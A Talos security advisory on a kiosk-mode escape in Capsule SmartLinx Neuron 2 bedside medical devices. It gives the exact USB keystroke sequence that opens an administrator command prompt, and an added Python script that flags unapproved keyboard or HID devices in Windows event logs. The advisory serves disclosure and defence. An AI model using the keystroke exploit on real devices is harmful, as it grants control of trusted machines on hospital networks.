TALOS-2019-0785 (Talos Intelligence)
Apr 08, 2019 - 12:00 a.m.

Capsule Technologies SmartLinx Neuron 2 restricted environment protection mechanism failure vulnerability

2019-04-08 00:00:00
Talos Intelligence
www.talosintelligence.com
CVSS2: 7.2 High
Attack Vector: LOCAL
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C

CVSS3: 7.6 High
Attack Vector: PHYSICAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

EPSS: 0.001 Low
Percentile: 30.6%

Summary

A restricted environment escape vulnerability exists in the “kiosk mode” function of Capsule Technologies SmartLinx Neuron 2 medical information collection devices running versions 9.0.3 or lower. A specific series of keyboard inputs can escape the restricted environment, resulting in full administrator access to the underlying operating system. An attacker can connect to the device via USB port with a keyboard or other HID device to trigger this vulnerability.

Tested Versions

Capsule Technologies SmartLinx Neuron 2 9.0.3 or lower.

Product URLs

<https://www.capsuletech.com/capsule>

CVSSv3 Score

7.6 - CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-693: Protection Mechanism Failure

Details

The Capsule Technologies SmartLinx Neuron 2 is a “bedside mobile clinical computer that enables the automatic collection of vital signs data. It features local data storage, and connects to the hospital network” and “is the core hardware component of Capsule™ medical device information system,” according to the manufacturer.

The devices feature a restricted environment, commonly referred to as “kiosk mode,” to prevent a user from exiting the running applications and accessing the underlying operating system. It is possible to connect a USB keyboard or other HID device and, through a series of specific keystrokes, escape this restricted environment and access the Microsoft Windows operating system with full administrator permissions. This access could provide an attacker with full control of a trusted device on a hospital’s internal network.

Exploit Proof of Concept

Connect a USB keyboard to the device. Entering the following keystrokes will escape the restricted environment and open an operating system command prompt with administrator privileges.

1. ALT
2. DOWN 6 times
3. ENTER*
4. SHIFT 5 times
5. SHIFT-TAB
6. SPACE
7. SHIFT-TAB
8. SPACE
9. cmd.exe
10. ENTER

*may need to perform steps 1-3 two times

Alternatively, programming a USB Rubber Ducky with the following “duck code” will automatically yield the same results as the above.

Mitigation

Apply vendor software updates; versions after 9.0.3 are not vulnerable. Devices running versions 10.x are not affected.

Restrict physical access to vulnerable devices and ensure they remain outside of the organization’s security perimeter. Ensure data or communications from said devices are not implicitly trusted by internal systems. If possible, physically disable or obstruct access to USB ports on vulnerable devices. Monitor logs for signs of connections of unauthorized peripherals to vulnerable devices.
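
One way to act on the log-monitoring advice above, as an added example that is not part of the advisory or of any vendor guidance: a Python check that scans exported Windows Security-log XML for event 6416 ("A new external device was recognized by the system") and reports keyboard or HID devices that are not on an allowlist. It assumes the device's Windows build records event 6416 (this requires the "Audit PNP Activity" audit subcategory to be enabled) and that events are exported under a root `<Events>` element; the host name, VID/PID values and sample events are constructed.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Windows device setup class GUIDs for devices that can inject keystrokes.
INPUT_CLASSES = {"{4d36e96b-e325-11ce-bfc1-08002be10318}",   # Keyboard
                 "{745a17a0-74d3-11d0-b6fe-00a0c90f57da}"}   # HIDClass
# Assumption: site allowlist of approved VID/PID strings (placeholder value).
APPROVED = {"VID_0001&PID_0001"}

# Constructed sample: approved keyboard, unapproved keyboard, USB storage device.
SAMPLE = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>6416</EventID><TimeCreated SystemTime="2019-04-08T09:00:00Z"/><Computer>KIOSK-EXAMPLE</Computer></System>
 <EventData><Data Name="DeviceId">HID\VID_0001&amp;PID_0001\7&amp;aa&amp;0&amp;0000</Data>
  <Data Name="ClassId">{4d36e96b-e325-11ce-bfc1-08002be10318}</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>6416</EventID><TimeCreated SystemTime="2019-04-08T10:15:00Z"/><Computer>KIOSK-EXAMPLE</Computer></System>
 <EventData><Data Name="DeviceId">HID\VID_FFFF&amp;PID_0002\7&amp;bb&amp;0&amp;0000</Data>
  <Data Name="ClassId">{4D36E96B-E325-11CE-BFC1-08002BE10318}</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>6416</EventID><TimeCreated SystemTime="2019-04-08T11:00:00Z"/><Computer>KIOSK-EXAMPLE</Computer></System>
 <EventData><Data Name="DeviceId">USBSTOR\Disk&amp;Ven_Example\0001</Data>
  <Data Name="ClassId">{4d36e967-e325-11ce-bfc1-08002be10318}</Data></EventData></Event>
</Events>"""

def unapproved_input_devices(xml_text, approved=APPROVED):
    """Return (time, computer, device_id) for each 6416 event that reports a
    keyboard/HID-class device whose ID matches no allowlisted VID/PID string."""
    hits = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "6416":
            continue
        data = {d.get("Name"): (d.text or "")
                for d in ev.findall("e:EventData/e:Data", NS)}
        if data.get("ClassId", "").lower() not in INPUT_CLASSES:
            continue  # not a keystroke-capable device class
        dev = data.get("DeviceId", "")
        if any(a.upper() in dev.upper() for a in approved):
            continue  # matches an approved VID/PID string
        hits.append((ev.find("e:System/e:TimeCreated", NS).get("SystemTime"),
                     ev.findtext("e:System/e:Computer", namespaces=NS), dev))
    return hits

if __name__ == "__main__":
    for hit in unapproved_input_devices(SAMPLE):
        print("ALERT unapproved input device:", *hit)
```

On a kiosk where no keyboard is ever expected, pass an empty allowlist so that every keyboard or HID arrival raises an alert. VID/PID strings are reported by the device itself, so a match on the allowlist does not prove the peripheral is the approved one.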

Timeline

2019-02-26 - Vendor Disclosure
2019-02-28 - Vendor tested & confirmed does not reproduce on Version 10.1
2019-04-08 - Public Release
2020-08-14 - Vendor clarified that versions 9.0.3 or lower were affected and has issued a hotfix for those versions which can be downloaded from their customer portal.
